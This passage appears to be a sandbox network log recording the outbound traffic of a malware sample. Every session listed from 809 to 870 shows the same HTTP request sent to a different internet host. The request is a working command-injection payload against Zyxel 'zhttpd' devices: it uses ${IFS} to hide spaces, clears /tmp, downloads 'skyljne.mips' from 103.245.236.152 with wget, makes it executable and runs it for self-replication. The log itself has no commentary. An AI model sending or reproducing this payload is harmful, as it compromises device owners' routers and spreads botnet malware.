                                          Jan 14, 2024 15:46:01.707755089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          809192.168.2.2348292187.78.92.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707793951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          810192.168.2.2354504102.60.217.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707812071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          811192.168.2.234777294.227.9.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707840919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          812192.168.2.2357716141.118.63.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707880974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          813192.168.2.2350130106.145.230.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707905054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          814192.168.2.2337350200.10.92.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707911015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          815192.168.2.23407208.19.55.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707946062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          816192.168.2.235057264.97.247.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707983017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          817192.168.2.2344180205.39.197.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708002090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          818192.168.2.2345476161.171.181.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708039045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          819192.168.2.2339050203.205.234.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708055019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          820192.168.2.2355068103.103.99.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708105087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          821192.168.2.2356290223.166.151.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708146095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          822192.168.2.234435099.18.146.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708153963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          823192.168.2.2358518146.73.251.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708209038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          824192.168.2.2359914107.251.82.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708218098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          825192.168.2.233586027.5.129.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708260059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          826192.168.2.2340304146.210.197.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708278894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          827192.168.2.2341784171.71.234.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708302975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          828192.168.2.235160071.232.164.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708313942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          829192.168.2.234727243.237.77.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708373070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          830192.168.2.2334544169.45.247.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708411932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          831192.168.2.234077259.15.34.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708411932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          832192.168.2.234835861.30.156.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708457947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          833192.168.2.235976646.214.206.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708462954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          834192.168.2.2360566174.215.154.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708497047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          835192.168.2.235285673.63.21.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708525896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          836192.168.2.235965059.4.14.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708550930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          837192.168.2.2352918211.223.114.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708600998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          838192.168.2.233337424.103.56.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708623886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          839192.168.2.2334456141.14.39.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708653927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          840192.168.2.233297238.241.50.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708694935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          841192.168.2.235521094.172.34.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708698988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          842192.168.2.2356958123.179.95.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708755970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          843192.168.2.234338079.236.138.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708776951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          844192.168.2.234994872.141.81.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708785057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          845192.168.2.2358126106.113.243.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708810091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          846192.168.2.233933213.141.59.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708839893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          847192.168.2.2345632175.10.248.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708872080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          848192.168.2.2348856169.222.234.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708916903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          849192.168.2.235249083.209.41.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708928108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          850192.168.2.233763447.153.150.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708936930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          851192.168.2.2342416185.237.75.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.708997011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          852192.168.2.2337050207.181.230.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709022999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          853192.168.2.233886088.47.160.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709022999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          854192.168.2.235834694.148.26.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709078074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          855192.168.2.2345972134.84.87.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709100008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          856192.168.2.2341912175.253.194.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709127903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          857192.168.2.2356496221.26.80.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709151030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          858192.168.2.2332918122.99.177.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709193945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          859192.168.2.2347770158.209.94.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709224939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          860192.168.2.23425564.50.199.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709233046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          861192.168.2.234905419.174.144.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709248066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          862192.168.2.234566496.140.191.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709306002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          863192.168.2.234547090.204.246.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709306955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          864192.168.2.233734212.233.171.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709341049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          865192.168.2.2340040112.99.20.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709366083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          866192.168.2.235815295.158.78.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709383011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          867192.168.2.235123065.206.123.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709410906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          868192.168.2.233866240.57.133.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709449053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          869192.168.2.234431020.138.90.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709458113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          870192.168.2.2346922138.72.94.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.709516048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          871192.168.2.234230867.92.249.100443
                                          TimestampBytes transferredDirectionData
